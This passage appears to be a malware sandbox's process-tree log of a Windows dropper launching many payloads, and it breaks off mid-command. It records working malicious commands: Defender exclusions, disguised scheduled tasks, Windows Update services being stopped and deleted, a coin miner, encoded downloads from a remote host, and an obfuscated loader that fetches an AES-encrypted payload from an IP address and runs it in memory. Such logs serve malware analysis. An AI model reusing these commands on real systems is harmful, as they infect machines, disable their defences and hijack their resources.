"C:\Windows\Temp\tel.exe"
3⤵
PID:5012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 280
4⤵
- Program crash
PID:2992

C:\Windows\Temp\fcc.exe
"C:\Windows\Temp\fcc.exe"
3⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
4⤵
PID:1268

C:\Windows\Temp\jjj.exe
"C:\Windows\Temp\jjj.exe"
3⤵
PID:2472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 268
4⤵
- Program crash
PID:2220

C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1230.exe"
2⤵
PID:580

C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
"C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
2⤵
PID:1268

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
2⤵
- Launches sc.exe
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
4⤵
- Launches sc.exe
PID:1560

C:\Users\Admin\AppData\Local\Temp\Files\9.exe
"C:\Users\Admin\AppData\Local\Temp\Files\9.exe"
2⤵
PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 276
3⤵
- Program crash
PID:1936

C:\Users\Admin\AppData\Local\Temp\Files\update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
2⤵
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
3⤵
PID:4584

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "WindowsSecurity" /SC ONLOGON /TR "C:\ProgramData\WindowsSecurity.exe" /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:2368

C:\ProgramData\WindowsSecurity.exe
"C:\ProgramData\WindowsSecurity.exe"
3⤵
PID:1184

C:\Users\Public\svchost.exe
"C:\Users\Public\svchost.exe"
3⤵
PID:1956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcAB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQB0AG8AbwBsAC4AYwBvAG0ALwBnAGUAdAAuAGUAeABlACcALAAgADwAIwBuAGsAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAdgBrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGcAZQB0AC4AZQB4AGUAJwApACkAPAAjAHMAYwBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZQBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBnAGUAdAAuAGUAeABlACcAKQA8ACMAYwB3AHUAIwA+AA=="
4⤵
PID:3888

C:\Users\Admin\AppData\Roaming\get.exe
"C:\Users\Admin\AppData\Roaming\get.exe"
5⤵
PID:5944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAdgByACMAPgA="
6⤵
PID:3192

C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
"C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
6⤵
- Executes dropped EXE
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Bypass.exe'
7⤵
PID:5428

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Bypass" /SC ONLOGON /TR "C:\Windows\System32\Bypass.exe" /RL HIGHEST
7⤵
- Creates scheduled task(s)
PID:4032

C:\Windows\System32\Bypass.exe
"C:\Windows\System32\Bypass.exe"
7⤵
PID:5836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp234.tmp.bat""
7⤵
PID:4168

C:\Windows\system32\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:6036

C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
6⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe'
7⤵
PID:5612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
7⤵
PID:5528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
7⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBACF.tmp.bat""
3⤵
PID:1844

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:3864

C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
2⤵
PID:1460

C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
2⤵
PID:2052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
3⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1728
3⤵
- Program crash
PID:4372

C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
2⤵
PID:1940

C:\Windows\syspolrvcs.exe
C:\Windows\syspolrvcs.exe
3⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\125323166.exe
C:\Users\Admin\AppData\Local\Temp\125323166.exe
4⤵
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 268
5⤵
- Program crash
PID:3512

C:\Users\Admin\AppData\Local\Temp\2296424173.exe
C:\Users\Admin\AppData\Local\Temp\2296424173.exe
4⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"
2⤵
PID:2304

C:\Windows\SysWOW64\SCHTASKS.exe
SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:3580

C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"
2⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe"
2⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe"
2⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\Files\Kcqqn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Kcqqn.exe"
2⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
2⤵
PID:5408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 236
3⤵
- Program crash
PID:5324

C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"
2⤵
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
PID:2984

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
6⤵
- Launches sc.exe
PID:5272

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
6⤵
- Launches sc.exe
PID:4136

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
6⤵
- Launches sc.exe
PID:6836

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:7064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
PID:6696

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:916

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:5648

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:5284

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:3424

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
PID:4060

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
3⤵
PID:5200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
3⤵
PID:1016

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
2⤵
PID:5668

C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
2⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:3768

C:\Windows\System32\certutil.exe
C:\Windows\System32\certutil.exe
4⤵
PID:848

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:6012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF9C7.tmp.bat""
3⤵
PID:2832

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4596

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:3820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:3192

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:5320

C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sadsadsadsa.exe"
2⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
2⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\is-27EH2.tmp\Cheat.tmp
"C:\Users\Admin\AppData\Local\Temp\is-27EH2.tmp\Cheat.tmp" /SL5="$3014E,30157316,832512,C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
3⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe
"C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe"
2⤵
PID:2820

C:\Users\Admin\AppData\Local\Temp\Files\she.exe
"C:\Users\Admin\AppData\Local\Temp\Files\she.exe"
2⤵
PID:6544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAHQAOABLAEYAMABDAEEANwBWAFcALwAyAC8AYQBSAGgAVAAvAHUAWgBYADYAUAAxAGcAVABFAHIAWgBHAHcAUwBZAGsAVABTAHQAVgBtAGcAMAAyAHQAZwBzAEUATwBHAHcAQwBHAGEAcQBNAGYAZABnAFgAegBsADkAaQBuAHcATgAwADIALwArACsAZAA0AEQAVABiAEcAMgAzAGQAdABLAHMAUgBOAHkAOQBlADEAOAAvADcANwAxADcAdAB5AGsAVABuADUARQAwAEUAYgB5AHMARgBIADUANwA5AGYATABGADIATQB1ADkAVwBCAEIAcgBzAFcARQAyAGgARgBvAHgARwAwAGsAdgBYAGcAQwA1ADkAaABnAGsAdwBuAHQAQgB2AEYATwB6AHIASgBmAEcASABrAGwAVwA3ADkANQAxAHkAegB6AEgAQwBUAHYAdABtADMAMwBNADEASwBMAEEAOABaAG8AUwBYAEkAaQBTADgATABzAHcAagAzAEMATwBYADkAKwBzADcANwBIAFAAaABOACsARQAyAHMAZABtAG4ANgBaAHIAagA1ADcAWgBEAGwAMwBQAGoANwBEAHcAVwBrADAAQwBmAGoAWgBJAGYAWQArADcAMABrAFEAWgBKAFUAeQBzAC8ALwBwAHIAWABiAHAANwByAGEAeQBhACsAawBQAHAAMABVAEsAcwBvADAAUABCAGMATgB3AE0ASwBLADEATAB3AGgAOABTAE4AegBnADcAWgBGAGkAcwBEADQAbQBmAHAAMABXADYAWQBjADAANQBTAFMANwBhAFQAUwBjAHAAdgBBADAAZQBnAGIAWgBIAFAATQBRAHMAUwBvAE8AaQBMAGsARQBRADgASgBkAGoAVgB1AGEASgB3AE0AUABoADgAcQBkAFQAcwBRADcATABjAFoANwA2AGEAaABEAGsAdQBDAGoAcQBEAGUARwBPAGEANwA1AGIAcgBYADQAUgA3ADgANQBtAHAAMgBYAEMAUwBJAHkAYgBWAHMASgB3AG4AbQBZAEkANQA0AC8ARQB4ADAAWABUADkASgBLAEEANABpAG4AZQByAEUAQQBLAHMAWgB3AGsANABVAHEAUwBnAE8AMAB4ADMAVwBLAHgAbABwAFMAVQBOAG8AUQBmAFUAUwBPAE8AOABLADQAQwA3AFgAdQBGAHgATwBkAEMAdwBEAFYAbQB1AGQAUwBBAEwASAA0AFoANQBqAEEATgBTAG8AcABQAGcAdgBXAHYAKwBNAGsAVABMADgARgAzAFQAagA3AEEAOQBzAGUAcgBsADYAOQBlAGIAcQBvADYAVwBmAGQAdgA3AFAAYgB6AFMAbwBIAFYAaQA3AHYAagBHAG8ATgB6ADQAagBnAHQAeQBKAEgAeAB2AFMAQQAzAGgAQwBIAFkAOABWAGkAYQBIADIAQgBiAG0AKwBVAGwAbABsAFoAUAAwAEEAcQAxADUAUABIAGoAeAA3AHoAeABiAFEAVgBLAHgAUQAyADgAaAAxADAARwBsAEQAcwAzAEoAYwBFAEsASgBNADcAcAByAEoAVQBhADgAagBqADkAMgAyAFgAWgB3AHgAdQBTADQATgA0AGgAOABXAEwAaQBWADUAVQBuAGYAZwAxAGsAdgBLAEgANABHAEcAUwB6AFkAaAB1AEIAVAAyAEwAOQBmAEkAQwBEAEgAcQBZADQAOQBCAGoASABqAGUAZgA2AEMAegBFADkASgB1AHgASgBWAGkAcwBKAEQAWABDAHUAKwBwAEMAbwBBAHIAeQBDAEgARQBwAC8AZABlAGEAVQBDAHIARgB1AEoAVQBNAGMAQQAwAGEAbgBQAFIAUgBmAGIAUQBQADEAagBpAHYAdQBjADQAMABmAEsAdQB0ADgARAAwAHoAMQBMAHYAVwBLAG8AaQBHAE0AUwAyAGcANAB2AHkARQBnADcARgBFAGMATgBBAFEAMQBLAGMAagA1AFMAQwAxAFoAZQBsAHoAVwBQADcAcwA3AEwAQwBrAGoAdgBsAGUAdwBTAHQAMQBLAHEAbgBBADgAMgArAHUAbQBTAGMASAB5ADAAbwBlADAAUQBlAHcAegBsAEcARwBmAGUASgBSAEQAMABSAEIATQBFAG0ARAB0AGcARQBoAFkAMgBhADEALwBGAFkAaQB1AFIAeQBuADAAQQBXAGgANgBoAEUAUQBBAGgAUQBPAEEARwBDACsARwBIAEYAdwA4AEoAVgA1AHEASQBzAHkAcwBPAEsATQA0AEIAcQBaAGoANgB4AHYAVQBDADYASABSAHoAKwBWACsATABCADgAdgB4AEUASAA5ADcAeQA1AFcAOQBYAHcAcQBYAGcANQBHAGgAYwBJAHoAQgB5AEgARABpAEsAYQBzAEkAYgBnAGsAWgAzAEMARABjAEcAQwBoAGkAdgA2AGoAKwBXAGQAMwB4ADkARwBSAGIAbwA3AFAAdQBSAEMAcgBIAHIAbgBUAEQAbwB3AFgAZABtADIAagB2AGUARQAxAGUAYwBiAGwAaQBFAEwATwBBAEEARQBqAFQAMgBQAE4ASwAvAEIAVgA1ADMAUgBQAGkARAArADEAZABOAEsANwBIAFAAZgBTAFQAeQBwADgAdQBqAEcAZAB1AEIAcAB5ADMASwBVADEARABHAHkASwBMAEkAWQBXAE8AaABrADQAVQBXAFEAUgB4AFEAcABoAGYAMwBEADAAYwBNAHoAawA3AE0ATgBzAFoAdABxAG8AWgA2AHAANQBiAHgAOQB0AFYASwB1AHcAZABGAE0ANwBUAEIAUgBOADkAVQAzAHkAeAByAFUAMQB4AHcARQA1ADAAaAAxAE0ANwB2AGUAVwBHAG0AaAB4AGUAQgBzAHUAdQBqAHQAcgBIAE4AMQBhAFkASwBnADcAQwBLADAAUQBmAGoAVQByADgAagBWADUASwBZAGUAYQBiAEgAUQBIAFMASQB0ADAASQBxAHMAaABtAHAAaQBUAGoAcgBLADAAVwB0AGQAVQBJADUAKwBRAGgAVgBSAHoALwBtAFQAdgB5AFkANwBlADYAWgBpADMAKwA1AGsANgBHAHQAcABxAFoATgB3AEUAaAB0AEkAMgBqAHYASgBiAEwAcgAvAGMAOQBnAGMAOQAvAGIAagAzACsAWAA2AHkASwBIAFMAaQBnAHgAMwBkAFcARQB6AGMAQwBNAC8AZABUAEoAdgByAHgAbgBMAGkAWgBsAGIANAA4AHkANgBjAHUASQBOAFcAeAA0AGcAMABvAEYAdABrAFAAOABoAFEAQwB6ADUARgBBAFIAegBZAEQASwAwAHYATAA3AHoANQBaAGIAYQBPAFgAUgBrAHcAbQBpAE0AcgBpAFoAQwAvADYAYwA1AE0AUAA5AFoAYQBMAGQAZABSAFIAaABiAEIAeABtAHkAKwBsAGYAYwA3AFgAZAA0AGYAMwBCAEgASQBwAEYAZAB1AEUAaQBjAGMAVgBuAFgAYwBjAHEAOQBVAG0AYQArAFUAdwBiADAAdQAzADMAUQA3AG4ANABhAGsAYwB4AGoAZQBXACsAcAA4AFMAKwB5AGQAawA1AGkANwBjAFEARwBBAGEASwBPAGgAVAAyAGQATwBPACsAMAA1AGMAbgB6AGwAZAB1AEwATgBuAHMATwBrADkAbABvAEsAagBxADcANABhAHQARAB1AEsASABQAGQALwByAEIAbwA3ADQAMABnAGQAZwAwADMAcABzAGkAUgA5AHoATQBrAEwAMwBmAHIAZABqAEQARwBqAGkAMwA3AC8AWAAyADYAdgBOAGUAcwBtA